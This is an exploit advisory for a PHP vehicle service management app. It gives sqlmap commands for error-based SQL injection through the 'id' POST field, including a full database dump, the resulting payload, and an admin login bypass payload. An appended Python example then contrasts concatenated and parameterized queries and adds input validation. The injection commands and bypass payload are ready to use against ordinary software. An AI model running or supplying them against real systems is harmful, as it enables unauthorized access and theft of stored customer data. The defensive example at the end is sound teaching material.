# Exploit Title: Vehicle Service Management 1.0 - SQL Injection Error Based
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:
Step 1 - Open sqlmap
Step 2 - Enter the payload string for sqlmap (edit localhost to site address)
Step 3 - Dump database info.

SQLMAP Command:
sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --technique=E

Results:
Parameter: id (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick Up&pickup_address=aa

Step 3: Dump the entire database.
sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --dump


# Exploit Title: Vehicle Service Management 1.0 - SQL Authentication Bypass
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:
Step 1 - Go to http://site/admin/login.php (to login)
Step 2 - Enter the payload below for username and password
Step 3 - Login as admin!

Payload: ' or 1=1-- -

# Profit
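
Added example, not part of the original advisory or the application's source: the login payload above run against a string-concatenated query and a parameterized one, plus a numeric check for the `id` POST field. The advisory does not show the PHP code, so the table layout, query shape and function names here are assumptions, modelled in Python with an in-memory SQLite table.

```python
import sqlite3

PAYLOAD = "' or 1=1-- -"  # login payload quoted in the advisory


def make_db():
    # Constructed stand-in data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'constructed-hash')")
    return db


def login_concatenated(db, username, password):
    # Vulnerable pattern: input is pasted into the SQL text, so a quote in
    # the input closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    # Hardened pattern: placeholders bind input as data, never as SQL text.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def parse_request_id(raw):
    # The `id` field is expected to be numeric: reject anything else
    # before it gets near a query (and still bind it as a parameter).
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return int(raw)


if __name__ == "__main__":
    db = make_db()
    print("concatenated, payload :", login_concatenated(db, PAYLOAD, PAYLOAD))
    print("parameterized, payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
    print("parameterized, valid  :", login_parameterized(db, "admin", "constructed-hash"))
    try:
        parse_request_id("1' AND 1=1-- x")
    except ValueError as exc:
        print("id rejected           :", exc)
```

In the PHP application the equivalent fix is a prepared statement with bound parameters for every query that takes request input.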